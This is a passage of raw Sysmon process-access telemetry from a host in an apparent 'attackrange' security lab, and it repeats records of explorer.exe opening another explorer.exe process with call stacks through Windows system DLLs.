16:58:29.655{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245752Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.655{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245751Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.655{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245750Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.655{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245749Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.655{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245748Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.655{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245747Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.655{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245746Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.655{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245745Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.655{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245744Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.655{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245743Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.655{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245742Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.655{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245741Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.655{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245740Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.655{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245739Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.655{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245738Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.655{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245737Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.655{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245736Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.655{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245735Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.655{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245734Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.655{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245733Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.655{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245732Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.655{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245731Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.655{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245730Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.655{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245729Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.655{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245728Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.655{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245727Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.655{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245726Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.655{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245725Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 